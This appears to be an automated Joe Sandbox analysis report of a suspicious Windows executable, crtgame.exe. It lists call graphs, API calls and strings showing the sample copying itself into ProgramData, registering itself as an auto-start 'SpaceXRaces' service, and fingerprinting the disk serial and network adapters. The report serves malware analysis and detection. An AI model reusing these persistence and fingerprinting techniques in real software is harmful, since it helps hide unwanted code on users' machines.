2185 403282 2177->2185 2178 40318b 2178->2177 2180 40319d 2178->2180 2180->2066 2180->2067 2182 403209 GetModuleFileNameA 2181->2182 2183 403201 2181->2183 2182->2183 2183->2185 2199 404d9c 2183->2199 2185->2180 2202 403135 GetModuleHandleA 2185->2202 2187 403323 2186->2187 2187->2071 2189 403b65 2188->2189 2190 403b6c HeapAlloc 2188->2190 2191 403b89 VirtualAlloc 2189->2191 2190->2191 2196 403bc1 2190->2196 2192 403ba9 VirtualAlloc 2191->2192 2193 403c7e 2191->2193 2194 403c70 VirtualFree 2192->2194 2192->2196 2195 403c86 HeapFree 2193->2195 2193->2196 2194->2193 2195->2196 2196->2071 2198 402dac GetVersionExA 2197->2198 2198->2177 2198->2178 2204 404db3 2199->2204 2203 40314c 2202->2203 2203->2180 2206 404dcb 2204->2206 2208 404dfb 2206->2208 2211 405afa 2206->2211 2207 405afa 6 API calls 2207->2208 2208->2207 2210 404daf 2208->2210 2215 405a2e 2208->2215 2210->2185 2212 405b18 2211->2212 2214 405b0c 2211->2214 2221 405dbe 2212->2221 2214->2206 2216 405a59 2215->2216 2219 405a3c 2215->2219 2217 405a75 2216->2217 2218 405afa 6 API calls 2216->2218 2217->2219 2233 405b6f 2217->2233 2218->2217 2219->2208 2222 405def GetStringTypeW 2221->2222 2226 405e07 2221->2226 2224 405e0b GetStringTypeA 2222->2224 2222->2226 2223 405e32 GetStringTypeA 2227 405ef3 2223->2227 2224->2226 2224->2227 2226->2223 2228 405e56 2226->2228 2227->2214 2228->2227 2229 405e6c MultiByteToWideChar 2228->2229 2229->2227 2230 405e90 2229->2230 2230->2227 2231 405eca MultiByteToWideChar 2230->2231 2231->2227 2232 405ee3 GetStringTypeW 2231->2232 2232->2227 2234 405bbb 2233->2234 2235 405b9f LCMapStringW 2233->2235 2238 405c21 2234->2238 2239 405c04 LCMapStringA 2234->2239 2235->2234 2236 405bc3 LCMapStringA 2235->2236 2236->2234 2237 405cfd 2236->2237 2237->2219 2238->2237 2240 405c37 MultiByteToWideChar 2238->2240 2239->2237 2240->2237 2241 405c61 2240->2241 2241->2237 2242 405c97 MultiByteToWideChar 2241->2242 2242->2237 2243 405cb0 LCMapStringW 2242->2243 2243->2237 2244 405ccb 2243->2244 2245 
405cd1 2244->2245 2247 405d11 2244->2247 2245->2237 2246 405cdf LCMapStringW 2245->2246 2246->2237 2247->2237 2248 405d49 LCMapStringW 2247->2248 2248->2237 2249 405d61 WideCharToMultiByte 2248->2249 2249->2237 2260 402ed2 2251->2260 2254 403068 2255 403071 2254->2255 2256 403076 2254->2256 2297 404c10 2255->2297 2303 404c49 2256->2303 2261 402ecf 2260->2261 2263 402ed9 2260->2263 2261->2075 2261->2254 2263->2261 2264 402efe 2263->2264 2265 402f0d 2264->2265 2268 402f22 2264->2268 2272 402f1b 2265->2272 2273 4036a3 2265->2273 2267 402f61 HeapAlloc 2269 402f70 2267->2269 2268->2267 2268->2272 2279 403e50 2268->2279 2269->2263 2270 402f20 2270->2263 2272->2267 2272->2269 2272->2270 2275 4036d5 2273->2275 2274 403783 2274->2272 2275->2274 2278 403774 2275->2278 2286 4039ac 2275->2286 2278->2274 2293 403a5d 2278->2293 2284 403e5e 2279->2284 2280 403f4a VirtualAlloc 2285 403f1b 2280->2285 2281 40401f 2282 403b58 5 API calls 2281->2282 2282->2285 2284->2280 2284->2281 2284->2285 2285->2272 2287 4039ef HeapAlloc 2286->2287 2288 4039bf HeapReAlloc 2286->2288 2290 403a15 VirtualAlloc 2287->2290 2292 403a3f 2287->2292 2289 4039de 2288->2289 2288->2292 2289->2287 2291 403a2f HeapFree 2290->2291 2290->2292 2291->2292 2292->2278 2294 403a6f VirtualAlloc 2293->2294 2296 403ab8 2294->2296 2296->2274 2298 404c1a 2297->2298 2299 404c47 2298->2299 2300 404c49 7 API calls 2298->2300 2299->2256 2301 404c31 2300->2301 2302 404c49 7 API calls 2301->2302 2302->2299 2305 404c5c 2303->2305 2304 404d73 2307 404d86 GetStdHandle WriteFile 2304->2307 2305->2304 2306 404c9c 2305->2306 2311 40307f 2305->2311 2308 404ca8 GetModuleFileNameA 2306->2308 2306->2311 2307->2311 2309 404cc0 2308->2309 2312 4058a7 2309->2312 2311->2075 2313 4058b4 LoadLibraryA 2312->2313 2315 4058f6 2312->2315 2314 4058c5 GetProcAddress 2313->2314 2313->2315 2314->2315 2316 4058dc GetProcAddress GetProcAddress 2314->2316 2315->2311 2316->2315 2318 4030bd 2317->2318 2326 4030d9 2317->2326 2321 4030c7 2318->2321 2322 
4030dd 2318->2322 2319 403108 2320 403109 HeapFree 2319->2320 2320->2326 2321->2320 2323 4030d3 2321->2323 2322->2319 2325 4030f7 2322->2325 2328 40337a 2323->2328 2334 403e0b 2325->2334 2326->2106 2329 4033b8 2328->2329 2333 40366e 2328->2333 2330 4035b4 VirtualFree 2329->2330 2329->2333 2331 403618 2330->2331 2332 403627 VirtualFree HeapFree 2331->2332 2331->2333 2332->2333 2333->2326 2335 403e38 2334->2335 2336 403e4e 2334->2336 2335->2336 2338 403cf2 2335->2338 2336->2326 2341 403cff 2338->2341 2339 403daf 2339->2336 2340 403d20 VirtualFree 2340->2341 2341->2339 2341->2340 2343 403c9c VirtualFree 2341->2343 2344 403cb9 2343->2344 2345 403ce9 2344->2345 2346 403cc9 HeapFree 2344->2346 2345->2341 2346->2341 2348 405894 2347->2348 2349 40589b 2347->2349 2351 4054c7 2348->2351 2349->2112 2358 405660 2351->2358 2355 40550a GetCPInfo 2357 40551e 2355->2357 2356 405654 2356->2349 2357->2356 2363 405706 GetCPInfo 2357->2363 2359 405680 2358->2359 2360 405670 GetOEMCP 2358->2360 2361 4054d8 2359->2361 2362 405685 GetACP 2359->2362 2360->2359 2361->2355 2361->2356 2361->2357 2362->2361 2365 405729 2363->2365 2370 4057f1 2363->2370 2364 405dbe 6 API calls 2366 4057a5 2364->2366 2365->2364 2367 405b6f 9 API calls 2366->2367 2368 4057c9 2367->2368 2369 405b6f 9 API calls 2368->2369 2369->2370 2370->2356 2372 40273c GetCommandLineW CommandLineToArgvW GetLocalTime 2371->2372 2373 401fbe 2372->2373 2374 401fd3 2373->2374 2403 401a1d 2374->2403 2376 401fdc 2376->2141 2376->2142 2378 402569 2377->2378 2379 402576 GetModuleHandleA GetModuleFileNameA 2378->2379 2380 402ec0 12 API calls 2379->2380 2381 402595 2380->2381 2382 402ec0 12 API calls 2381->2382 2383 4025a6 2382->2383 2384 4025db GetModuleHandleA GetModuleFileNameW RegOpenKeyExA 2383->2384 2385 4026d6 2384->2385 2386 402616 RegQueryValueExA 2384->2386 2385->2142 2385->2154 2386->2385 2387 402640 RegCloseKey 2386->2387 2388 402654 2387->2388 2389 402660 CreateDirectoryA 2388->2389 2390 402676 2389->2390 2391 402688 
CopyFileA 2390->2391 2391->2385 2392 40269e OpenSCManagerA 2391->2392 2392->2385 2393 4026af CreateServiceA 2392->2393 2394 4026dd CloseServiceHandle CloseServiceHandle 2393->2394 2395 4026cd CloseServiceHandle 2393->2395 2394->2385 2395->2385 2397 402362 WaitForSingleObject 2396->2397 2398 402368 2397->2398 2399 4023cc ExitProcess 2397->2399 2401 4023b1 Sleep 2398->2401 2441 4021c6 VirtualAlloc 2398->2441 2448 401ffb FindResourceA 2398->2448 2401->2397 2404 401a2c 2403->2404 2411 401a58 CreateFileA 2404->2411 2410 401a47 2410->2376 2412 401a86 2411->2412 2413 401a35 2411->2413 2414 401aa1 DeviceIoControl 2412->2414 2415 401b43 CloseHandle 2412->2415 2417 401b17 GetLastError 2412->2417 2431 402d06 2412->2431 2434 402cf8 2412->2434 2419 401b54 LoadLibraryA 2413->2419 2414->2412 2415->2413 2417->2412 2417->2415 2420 401b77 GetProcAddress 2419->2420 2421 401a3e 2419->2421 2422 401c21 FreeLibrary 2420->2422 2423 401b8e 2420->2423 2428 401c2f 2421->2428 2422->2421 2424 401b9e GetAdaptersInfo 2423->2424 2425 402d06 7 API calls 2423->2425 2426 401c1e 2423->2426 2427 402cf8 12 API calls 2423->2427 2424->2423 2425->2423 2426->2422 2427->2423 2437 401c5b GetWindowsDirectoryA 2428->2437 2430 401c3e 2430->2410 2432 4030b1 7 API calls 2431->2432 2433 402d0f 2432->2433 2433->2412 2435 402ed2 12 API calls 2434->2435 2436 402d03 2435->2436 2436->2412 2438 401cb7 2437->2438 2439 401c7e CreateFileA 2437->2439 2438->2430 2439->2438 2440 401ca2 GetFileTime CloseHandle 2439->2440 2440->2438 2445 4021f8 2441->2445 2442 40230a 2444 402331 Sleep 2442->2444 2443 402293 GetLastError LoadLibraryExA 2443->2445 2446 402347 2444->2446 2445->2442 2445->2443 2447 4022dc GetProcAddress 2445->2447 2446->2398 2447->2445 2449 402036 2448->2449 2450 40201d GetLastError SizeofResource 2448->2450 2449->2398 2450->2449 2451 40203d LoadResource LockResource GlobalAlloc 2450->2451 2452 402069 2451->2452 2453 402092 GetTickCount 2452->2453 2455 40209c GlobalAlloc 2453->2455 2455->2449 2457 4041d7 
GetCurrentProcess TerminateProcess 2456->2457 2460 4041e8 2456->2460 2457->2460 2458 403049 2458->2170 2459 404252 ExitProcess 2460->2458 2460->2459 2466 405c83 2467 405c92 2466->2467 2468 405c97 MultiByteToWideChar 2467->2468 2472 405cfd 2467->2472 2469 405cb0 LCMapStringW 2468->2469 2468->2472 2470 405ccb 2469->2470 2469->2472 2471 405cd1 2470->2471 2473 405d11 2470->2473 2471->2472 2474 405cdf LCMapStringW 2471->2474 2473->2472 2475 405d49 LCMapStringW 2473->2475 2474->2472 2475->2472 2476 405d61 WideCharToMultiByte 2475->2476 2476->2472 2478 4023d3 2479 402425 2478->2479 2480 4023da 2478->2480 2480->2479 2481 4023e5 GetLastError SetServiceStatus SetEvent 2480->2481 2481->2479 2505 405d37 2506 405d45 2505->2506 2507 405d49 LCMapStringW 2506->2507 2510 405cfd 2506->2510 2508 405d61 WideCharToMultiByte 2507->2508 2507->2510 2508->2510 2492 402428 RegisterServiceCtrlHandlerA 2493 402541 2492->2493 2494 40244b 2492->2494 2495 402459 SetServiceStatus GetLastError CreateEventA 2494->2495 2496 4024d2 SetServiceStatus CreateThread WaitForSingleObject CloseHandle 2495->2496 2497 4024b3 GetLastError 2495->2497 2498 402538 SetServiceStatus 2496->2498 2497->2498 2498->2493 2511 404b38 2512 404bca 2511->2512 2514 404b56 2511->2514 2513 404a40 RtlUnwind 2513->2514 2514->2512 2514->2513 2461 4041cb 2462 4041d7 GetCurrentProcess TerminateProcess 2461->2462 2465 4041e8 2461->2465 2462->2465 2463 404262 2464 404252 ExitProcess 2465->2463 2465->2464 2515 405ebb 2516 405ec2 2515->2516 2517 405ef3 2516->2517 2518 405eca MultiByteToWideChar 2516->2518 2518->2517 2519 405ee3 GetStringTypeW 2518->2519 2519->2517 2482 40305d 2489 4041ba 2482->2489 2484 403068 2485 403076 2484->2485 2486 404c10 7 API calls 2484->2486 2487 404c49 7 API calls 2485->2487 2486->2485 2488 40307f 2487->2488 2490 4041cb 3 API calls 2489->2490 2491 4041c7 2490->2491 2491->2484

                                                                              Callgraph

                                                                              • Executed
                                                                              • Not Executed
                                                                              • Opacity -> Relevance
                                                                              • Disassembly available
                                                                              callgraph 0 Function_00404A40 1 Function_00402548 65 Function_00402EC0 1->65 72 Function_00402DD0 1->72 79 Function_00402DE0 1->79 105 Function_00402CA0 1->105 2 Function_00404C49 52 Function_00402D20 2->52 58 Function_00405930 2->58 2->72 2->79 109 Function_004058A7 2->109 3 Function_0040334F 4 Function_00405150 5 Function_00403E50 11 Function_00403B58 5->11 12 Function_00404058 5->12 5->105 6 Function_00401051 7 Function_00402351 67 Function_004021C6 7->67 86 Function_00401FF7 7->86 89 Function_00401FFB 7->89 8 Function_00401B54 38 Function_00402D06 8->38 8->52 70 Function_004018CC 8->70 87 Function_00402CF8 8->87 9 Function_00404A58 10 Function_00401A58 10->38 10->52 10->70 10->87 11->105 13 Function_00405359 14 Function_0040445A 24 Function_00403068 14->24 14->52 14->65 14->72 96 Function_0040588B 14->96 115 Function_004030B1 14->115 15 Function_00401C5B 16 Function_0040305D 16->2 45 Function_00404C10 16->45 119 Function_004041BA 16->119 17 Function_00403A5D 18 Function_00404A60 19 Function_00405660 20 Function_00404760 21 Function_00402960 20->21 20->65 20->115 22 Function_00403162 44 Function_00405110 22->44 62 Function_00403135 22->62 71 Function_00404FD0 22->71 98 Function_00405090 22->98 103 Function_00404D9C 22->103 106 Function_00402DA0 22->106 23 Function_00404264 24->2 24->45 25 Function_00405368 26 Function_00402B69 27 Function_00405B6F 101 Function_00405D93 27->101 27->106 28 Function_00402F72 28->14 28->20 31 Function_0040417C 28->31 32 Function_0040427E 28->32 36 Function_00404402 28->36 47 Function_00404513 28->47 83 Function_004026F0 28->83 97 Function_0040308D 28->97 100 Function_00404892 28->100 110 Function_004041A9 28->110 111 Function_004032AA 28->111 29 Function_00402B78 30 Function_0040337A 30->4 31->23 124 Function_004043BF 32->124 33 Function_00405C7F 34 Function_00401000 35 Function_0040A400 95 Function_00405485 36->95 36->96 37 Function_00405706 37->27 123 
Function_00405DBE 37->123 38->115 39 Function_00403307 40 Function_0040A408 41 Function_00403E0B 84 Function_00403CF2 41->84 42 Function_00404B0D 43 Function_0040530E 45->2 46 Function_00405210 47->24 47->65 47->96 114 Function_004045AC 47->114 48 Function_00404B16 49 Function_0040311A 50 Function_00401A1D 50->8 50->10 55 Function_00401029 50->55 57 Function_00401C2F 50->57 92 Function_00401982 50->92 51 Function_00402B1E 53 Function_00402A20 54 Function_00402428 54->105 56 Function_00405A2E 56->27 88 Function_00405AFA 56->88 57->15 57->70 59 Function_00404B30 59->0 59->48 93 Function_00404A82 59->93 60 Function_00402132 61 Function_00405D33 63 Function_00405D37 64 Function_00404B38 64->0 64->48 64->93 73 Function_00402ED2 65->73 66 Function_00404FC5 67->21 67->60 67->105 68 Function_004054C7 68->19 68->37 78 Function_004056DD 68->78 112 Function_004056AA 68->112 69 Function_004041CB 69->23 70->6 70->21 70->34 73->49 91 Function_00402EFE 73->91 74 Function_004023D3 75 Function_004092D3 76 Function_004051D5 77 Function_00402DD7 80 Function_004029E5 81 Function_00404AEA 82 Function_004051EC 83->1 83->7 83->52 83->72 83->79 83->105 122 Function_00401FBE 83->122 104 Function_00403C9C 84->104 85 Function_00404BF5 85->93 87->73 88->123 89->21 121 Function_00401CBD 89->121 90 Function_004029FC 91->5 108 Function_004036A3 91->108 92->6 92->21 92->34 92->105 93->48 94 Function_00405C83 94->106 102 Function_00405496 95->102 96->68 97->2 97->45 99 Function_00405390 100->24 100->65 116 Function_00404DB3 103->116 107 Function_00402BA0 108->17 113 Function_004039AC 108->113 110->69 111->11 111->22 111->39 115->3 115->30 115->41 117 Function_00403DB4 115->117 116->56 116->88 118 Function_00405EB7 119->69 120 Function_00405EBB 122->50 122->105 123->105 123->106

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00402714
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\CRTGame\crtgame.exe,00000104,?,00000000), ref: 0040272B
                                                                              • GetCommandLineW.KERNEL32(?,?,00000000), ref: 00402748
                                                                              • CommandLineToArgvW.SHELL32(00000000,?,00000000), ref: 0040274F
                                                                              • GetLocalTime.KERNEL32(00409F20,?,00000000), ref: 0040275C
                                                                              • lstrcmpiW.KERNELBASE(?,/chk,?,00000000), ref: 0040277E
                                                                              • CreateFileA.KERNEL32(C:\Program Files (x86)\CRTGame\crtgame.exe,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000), ref: 004027CB
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004027D2
                                                                              • ExitProcess.KERNEL32 ref: 004027D9
                                                                              • lstrcmpiW.KERNEL32(?,00407104,?,00000000), ref: 004027FB
                                                                              • RegCreateKeyExA.KERNELBASE(80000002,Software\SpaceRaces,00000000,00000000,00000000,00000006,00000000,?,?,?,00000000), ref: 0040282A
                                                                              • GetTickCount.KERNEL32 ref: 0040284D
                                                                              • wsprintfA.USER32 ref: 00402865
                                                                              • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 00402888
                                                                              • RegCloseKey.KERNELBASE(?), ref: 00402891
                                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?,?,00000000), ref: 0040294C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCommandCreateFileHandleLineModulelstrcmpi$ArgvCountCtrlDispatcherExitLocalNameProcessServiceStartTickTimeValuewsprintf
                                                                              • String ID: /chk$C:\Program Files (x86)\CRTGame\crtgame.exe$Software\SpaceRaces$SpaceXRaces$SpaceXRaces$test$tsr1209%d
                                                                              • API String ID: 99468869-3986529438
                                                                              • Opcode ID: 803341d37248f940fd6434f59c57290a4552a2c8ba3ceefaceaf479661161746
                                                                              • Instruction ID: 49dc81ac6bcf3fd683536614608e289c009f5af55911e209b1bd681bcac14ea3
                                                                              • Opcode Fuzzy Hash: 803341d37248f940fd6434f59c57290a4552a2c8ba3ceefaceaf479661161746
                                                                              • Instruction Fuzzy Hash: 4B5131B1940209BFEB10DBA09E49FAE7BBCEB04345F104076F606F21E1D7789D148B69

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,00000000,74DEF360,00000000), ref: 00402582
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,?,?,00000000,74DEF360,00000000), ref: 00402589
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000208,?,?,?,?,?,?,?,?,?,?,?,?,00000000,74DEF360), ref: 004025EA
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,74DEF360,00000000), ref: 004025F1
                                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,?), ref: 00402608
                                                                              • RegQueryValueExA.KERNELBASE(?,Common AppData,00000000,00000001,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,?), ref: 00402632
                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,74DEF360,00000000), ref: 00402643
                                                                              • CreateDirectoryA.KERNELBASE(C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000), ref: 00402665
                                                                              • CopyFileA.KERNEL32(?,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000), ref: 00402694
                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 004026A2
                                                                              • CreateServiceA.ADVAPI32(00000000,SpaceXRaces,SpaceXRaces,000F01FF,00000010,00000002,00000001,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000,00000000,00000000,00000000,00000000), ref: 004026C3
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 004026D0
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E4
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$CloseModuleService$File$CreateNameOpen$CopyDirectoryManagerQueryValue
                                                                              • String ID: .exe$C:\ProgramData\SpaceXRaces\SpaceXRaces.exe$Common AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$SpaceXRaces
                                                                              • API String ID: 3461818117-4011302265
                                                                              • Opcode ID: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
                                                                              • Instruction ID: a3d5b12e1f90bb5d6e2ef9e639674f7dcae6e36a2f4b11c7066e8bc7fc52f7b9
                                                                              • Opcode Fuzzy Hash: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
                                                                              • Instruction Fuzzy Hash: 264193B1940108BBEB20ABA1DE4EE9F3A6CEF41749F00043AF601B11D2D7BD5D508A7D

                                                                              Control-flow Graph

                                                                              control_flow_graph 65 401b54-401b71 LoadLibraryA 66 401b77-401b88 GetProcAddress 65->66 67 401c2a-401c2e 65->67 68 401c21-401c24 FreeLibrary 66->68 69 401b8e-401b97 66->69 68->67 70 401b9e-401bae GetAdaptersInfo 69->70 71 401bb0-401bb9 70->71 72 401be4-401bec 70->72 75 401bca-401be0 call 402d20 call 4018cc 71->75 76 401bbb-401bbf 71->76 73 401bf5-401bf9 72->73 74 401bee-401bf4 call 402d06 72->74 79 401bfb-401bff 73->79 80 401c1e-401c20 73->80 74->73 75->72 76->72 81 401bc1-401bc8 76->81 79->80 84 401c01-401c04 79->84 80->68 81->75 81->76 86 401c06-401c0c 84->86 87 401c0f-401c1c call 402cf8 84->87 86->87 87->70 87->80
                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B66
                                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B7D
                                                                              • GetAdaptersInfo.IPHLPAPI(?,00000400,00000000,00000000,00000000), ref: 00401BA6
                                                                              • FreeLibrary.KERNEL32(00401A3E), ref: 00401C24
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                              • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                              • API String ID: 514930453-3667123677
                                                                              • Opcode ID: a9615e917c7d8da21abece12906e102e054d7a7f96f05c26df3a9cf8b4b55db1
                                                                              • Instruction ID: 19d1f7c7220f150a124496b0f3bded62544c7fcf715814b2fda3adae34ef3130
                                                                              • Opcode Fuzzy Hash: a9615e917c7d8da21abece12906e102e054d7a7f96f05c26df3a9cf8b4b55db1
                                                                              • Instruction Fuzzy Hash: 9D21B870944209AFEF21DFA5C9447EFBBB4EF45344F0440BAE504B22E1E7789A85CB69

                                                                              Control-flow Graph

                                                                              control_flow_graph 91 401a58-401a80 CreateFileA 92 401a86-401a9a 91->92 93 401b4e-401b53 91->93 94 401aa1-401ac9 DeviceIoControl 92->94 95 401acb-401ad3 94->95 96 401afc-401b04 94->96 97 401ad5-401adb 95->97 98 401add-401ae2 95->98 99 401b06-401b0c call 402d06 96->99 100 401b0d-401b10 96->100 97->96 98->96 103 401ae4-401afa call 402d20 call 4018cc 98->103 99->100 101 401b12-401b15 100->101 102 401b43-401b4d CloseHandle 100->102 106 401b30-401b3d call 402cf8 101->106 107 401b17-401b20 GetLastError 101->107 102->93 103->96 106->94 106->102 107->102 109 401b22-401b25 107->109 109->106 112 401b27-401b2d 109->112 112->106
                                                                              APIs
                                                                              • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00401A74
                                                                              • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401ABB
                                                                              • GetLastError.KERNEL32 ref: 00401B17
                                                                              • CloseHandle.KERNELBASE(?), ref: 00401B46
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                              • String ID: \\.\PhysicalDrive0
                                                                              • API String ID: 4026078076-1180397377
                                                                              • Opcode ID: 4b276423cefb6535b93749f4a35407bbc40f2b1ddf316d430708a30b7fc217e3
                                                                              • Instruction ID: 2ab55ed144571c3fa2fc985b9ad89e39486dc60e53794fabb09e903d28ee3d3f
                                                                              • Opcode Fuzzy Hash: 4b276423cefb6535b93749f4a35407bbc40f2b1ddf316d430708a30b7fc217e3
                                                                              • Instruction Fuzzy Hash: 9E317A71D00118AADB21EF96CD849EFBBB9EF40750F20817AE515B22A0E3785E45CF98

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetVersion.KERNEL32 ref: 00402F98
                                                                                • Part of subcall function 004032AA: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FD1,00000000), ref: 004032BB
                                                                                • Part of subcall function 004032AA: HeapDestroy.KERNEL32 ref: 004032FA
                                                                              • GetCommandLineA.KERNEL32 ref: 00402FE6
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00403011
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403034
                                                                                • Part of subcall function 0040308D: ExitProcess.KERNEL32 ref: 004030AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                              • String ID:
                                                                              • API String ID: 2057626494-0
                                                                              • Opcode ID: 6973291a08a62e7008eca22fd321bc7397b23a4f1d73c5b2d439b14b6e22de47
                                                                              • Instruction ID: 67841cd3009d396f381f20147254ff52d2e2d79fbc7827c85a5f588a1a3baf3d
                                                                              • Opcode Fuzzy Hash: 6973291a08a62e7008eca22fd321bc7397b23a4f1d73c5b2d439b14b6e22de47
                                                                              • Instruction Fuzzy Hash: 24217FB1800714AADB04AFA6DD0AA6E7BB9EB45704F10413EFA05BB2D1DB384850CB59

                                                                              Control-flow Graph

                                                                              control_flow_graph 144 401c5b-401c7c GetWindowsDirectoryA 145 401cb7-401cbc 144->145 146 401c7e-401ca0 CreateFileA 144->146 146->145 147 401ca2-401cb1 GetFileTime CloseHandle 146->147 147->145
                                                                              APIs
                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00401C74
                                                                              • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 00401C95
                                                                              • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00401CA8
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401CB1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateDirectoryHandleTimeWindows
                                                                              • String ID:
                                                                              • API String ID: 87451460-0
                                                                              • Opcode ID: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
                                                                              • Instruction ID: cc4b8a8173e68006100f6bb5cfe5cbca554eec38252bcd741f722b6c7c402e1e
                                                                              • Opcode Fuzzy Hash: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
                                                                              • Instruction Fuzzy Hash: 7CF0E27668021077E6209B359E8DFCB3AAD9BC6B60F010134BB46F21D0D6B49551C6B4

                                                                              Control-flow Graph

                                                                              control_flow_graph 148 4041cb-4041d5 149 4041d7-4041e2 GetCurrentProcess TerminateProcess 148->149 150 4041e8-4041fe 148->150 149->150 151 404200-404207 150->151 152 40423c-404250 call 404264 150->152 154 404209-404215 151->154 155 40422b-40423b call 404264 151->155 161 404262-404263 152->161 162 404252-40425c ExitProcess 152->162 158 404217-40421b 154->158 159 40422a 154->159 155->152 163 40421d 158->163 164 40421f-404228 158->164 159->155 163->164 164->158 164->159
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(?,?,004041B6,?,00000000,00000000,00403049,00000000,00000000), ref: 004041DB
                                                                              • TerminateProcess.KERNEL32(00000000,?,004041B6,?,00000000,00000000,00403049,00000000,00000000), ref: 004041E2
                                                                              • ExitProcess.KERNEL32 ref: 0040425C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
